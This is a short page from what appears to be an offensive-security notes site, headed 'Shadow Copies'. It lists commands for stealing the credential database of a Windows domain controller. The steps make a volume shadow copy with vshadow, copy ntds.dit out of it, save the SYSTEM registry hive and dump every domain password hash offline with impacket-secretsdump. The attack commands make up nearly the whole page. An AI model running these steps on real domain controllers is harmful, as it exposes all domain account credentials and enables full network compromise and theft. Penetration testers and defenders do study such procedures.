Shadow Copies

Use the MS signed vshadow tool to take a snapshot of the Domain Controller

vshadow.exe -nw -p  C:

Find the Shadow copy device name

Could look something like this \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2

Make a new NTDS.dit

copy \?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\windows\ntds\ntds.dit c:\ntds.dit.bak

Grab the system hive

reg.exe save hklm\system c:\system.bak

Dump NTDS.dit locally

impacket-secretsdump -ntds ntds.dit.bak -system system.bak LOCAL
PreviousGolden Ticket AttackNextSAM Cleanup

Last updated